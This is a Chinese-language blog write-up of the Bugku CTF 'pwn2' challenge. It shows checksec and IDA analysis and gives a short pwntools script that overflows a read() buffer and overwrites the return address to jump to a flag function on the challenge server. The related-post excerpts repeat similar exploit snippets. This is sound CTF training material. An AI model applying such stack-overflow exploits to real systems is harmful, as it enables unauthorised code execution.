bugku中pwn2的write up

最新推荐文章于 2021-08-30 16:52:11 发布
最新推荐文章于 2021-08-30 16:52:11 发布
阅读量349 收藏 3
点赞数
分类专栏: write up 文章标签: bugku pwn2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/darui_csdn/article/details/100571965
版权

bugku中pwn2的write up

作为一个初出茅庐的菜鸟,做几个简单的pwn题练一下,正好学一下基础知识。
首先来看这道题,checksec一下,我们发现,没有打开什么保护。
在这里插入图片描述
运行一下,看看需要在哪里插入payload。
在这里插入图片描述
注意这里需要先赋予运行权限,笔者作为新手犯了几次错误。
在这里插入图片描述
把程序放进IDA中看一下套路流程。
在这里插入图片描述
我们在read函数这里可以使程序溢出。也看到ebp的位置,偏移量为0x30。
很明显地发现了得到flag的函数:
在这里插入图片描述
在这里插入图片描述
得到地址0x0000000000400751。
开始构造exp。

from pwn import *
p = remote("114.116.54.89","10003")
p.recvuntil("?")
payload=0x30*'a'+8*'a'+p64(0x0000000000400751)
p.sendline(payload)
p.interactive()

注:这里的8*'a’是用来覆盖ebp的。
最后效果如下:
在这里插入图片描述
这道题目属于比较简单的栈溢出。

darui_csdn
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF练习平台pwn3(read_note)的writeup
只影的博客
03-05 1418
Bugku的pwn题,这道题分值最高,也是难度最大的一道。难点在于,第一要读懂题目找出漏洞,第二是要绕过各种保护机制,第三是exp的编写调试。看一眼程序的保护机制,发现除了RELRO所有保护全开,还是有点头疼的,毕竟我刚开始学pwn没几天,还没有做过PIE和Canary的题目,所以调试还是花了不少时间的。 首先分析程序,重要部分如下所示。一开始会让你输入一个路径,不存在的话就会报错推出,然后打...
BugKu - pwn2
Casuall的博客
07-06 3643
这道题来自于bugku旧平台的第二道pwn题,还是比较简单的,一个典型的缓冲区溢出题。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
BugkuCTF-PWN题pwn2-overflow超详细讲解
am_03的博客
08-30 1856
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
[Bugku CTF——Pwn] pwn2
Y_peak的博客
03-22 272
[Bugku CTF——Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 exploit from pwn import * p = remote('114.67.246.176',11431) get_shell = 0x0000000000400751 payload = 'a' * (0x30 + 8) + p64(get_shell) p.send(payload) p.inter
ctf.bugku ctf题目详解——pwn2
yeshen4328的专栏
05-26 1099
ctf.bugku ctf题目详解——pwn2 题目 程序分配了一个栈上的变量s,长度为0x30,并一开始置0. 9行开始从外部读取0x100的数据到s,由此可见此处存在一个栈溢出。 同时使用ida打开程序之后发现还存在一个get_shell的函数: 于是我们需要想方法利用溢出来调用这个get_shell函数。 x64函数调用规则 解题之前我们先学习下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目没有给出libc文件,也不容易获取libc版本
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
Bugku S3 AWD排位赛-9 pwn二进制
最新发布
08-27
Bugku S3 AWD排位赛-9 pwn二进制
pwn07.ret2syscall例题
11-11
ret2syscall例题
Writeup bugku刷题 pwn2
Migraine‘s Blog
05-13 2327
概述:bugku新出的pwn题,练一练手 关键字:栈溢出 x64 网址:https://ctf.bugku.com/challenges 分析一下代码,发现非常明显是x64下的栈溢出。 Pwntools生成shellcode >>> from pwn import * >>> context(os='linux...
[pwn]bugku pwn2
qq_18823653的博客
03-26 5446
首先检查了一下保护机制,发现几乎啥保护都没有,ida查看一下 read()函数存在溢出,然后又看了一下发现main函数下面有一个get_shell_函数,点进去看了看应该是让返回地址覆盖成getshell地址, gdb看一下偏移rbp前四位为bAA1,算一下偏移 到rbp偏移为48,向上8字节是父函数rbp,所以偏移56覆盖到返回地址,get_shell_地址为 exp如下: from pwn ...
BugkuCTF pwn1 pwn2 pwn4 pwn5 pwn3 详细writeup【橘小白】
kety_gz的博客
09-03 9129
buku的pwn按照难度的顺序依次是pwn1,pwn2,pwn4,pwn5,pwn3 这些题目的libc pwn1 nc连接后直接就有执行权限 ls cat flag 得到flag pwn2 下载文件放入ida 有一个有shell,我们只需要将程序跳转到这里 选择main F5查看代码 看到这个s申请了0x30个字节,但是下边read了0x100字节,就造成了栈溢出,我们只要将返回地址溢出为...
Bugku-pwn4详解
Casuall的博客
07-14 4383
这道题来自bugku的第三道pwn题,pwn4。首先进行一些常规检查。 一个64位动态链接的程序,没有开什么保护。 然后用IDA打开,有个危险函数read,可以用来溢出。 shift + F12查看有没有可疑字符串,然后在字符串上按x查看引用他的地方,找到了一个system函数 但是system函数里面的字符串并不是我们想要的'/bin/sh',尝试用ROPgadget去搜索,命令为ROPg...
bugkuCTF平台逆向题第三道游戏过关题解
iqiqiya的博客
12-27 7729
题目链接: http://123.206.31.85/files/cd2487de0516fa77d5fa911cdf2582c9/ConsoleApplication4.exe tips 查壳发现无壳(截图略) OD载入 发现有两个重要的段 0x001 0x002 分析处0x001每次输入n的值都会有只有那一个跳转调向它 那么我们直接修改跳转地址指向我们的0
Bugku旧平台pwn writeup
a370793934的专栏
11-28 739
Pwn1 nc 114.116.54.89 10001 连上cat flag: flag{6979d853add353c9} Pwn2 #!/usr/bin/env python3 # -*- coding:utf-8 -*- from pwn import * context.log_level='debug' p = process("./pwn2") #p = re...
BugkuCTF练习平台pwn5(human)的writeup
只影的博客
03-04 908
这道题的思路相对简单,但是比较有代表性。 首先查看防护机制,发现只打开了NX。用ida打开题目,发现文无法识别为字符串。这里需要用命令行打开ida,新建bat并编辑内容为D:\IDA_Pro_v7.0\ida64.exe -dCULTURE=all human即可。 漏洞有两处,第一处比较明显,是格式化字符串漏洞,如下所示。 memset(&s, 0, 0x20uLL); put...
Bugku pwn
ChanCherry的博客
08-25 747
pwn1 在Linux里面输入以下命令, nc 114.116.54.89 10001 //nc用于设置路由器 ls -l 然后cat flag,即可得到flag nc命令 nc命令是一个功能打包的网络实用程序,它通过命令行在网络上读取和写入数据;nc是为NMAP项目编写的,是目前已分裂的netcat家族的顶峰,它被设计成一个可靠的后端工具,可以立即为其他用户提供网络连接应用程序和用户。nc不...
BugkuCTF Writeup——Web
Lethe's Blog
03-07 2890
BugkuCTF Web——Writeup 作为我这个新手刷的第一个平台,bugku上面的大部分题目还算蛮友好的,这里主要记录一下其我认为还蛮有意思的题目。 web2 直接查看F12查看源码即可得flag。 计算器 简单计算题,但输入框限制输入长度,直接改改输入框的前端代码,输入计算结果,得到flag。 web基础$_GET 代码审计,GET方法传入what变量的值为’flag’即可得fl...
pwn题read,write函数都是什么作用
03-03
"pwn" 是计算机安全领域的一个术语,指的是通过攻击漏洞获取对目标系统的控制权限。 "read" 和 "write" 是在攻击漏洞时常用的两个函数,它们的作用是: - "read" 函数可以读取内存指定地址的数据; - "write" 函数可以将数据写入内存指定地址。 在攻击,攻击者可能利用 "read" 函数来泄露目标系统的机密数据,例如密码、密钥等。而 "write" 函数则可以用于修改目标系统的数据,例如覆盖函数指针,从而控制程序执行流程,达到攻击的目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值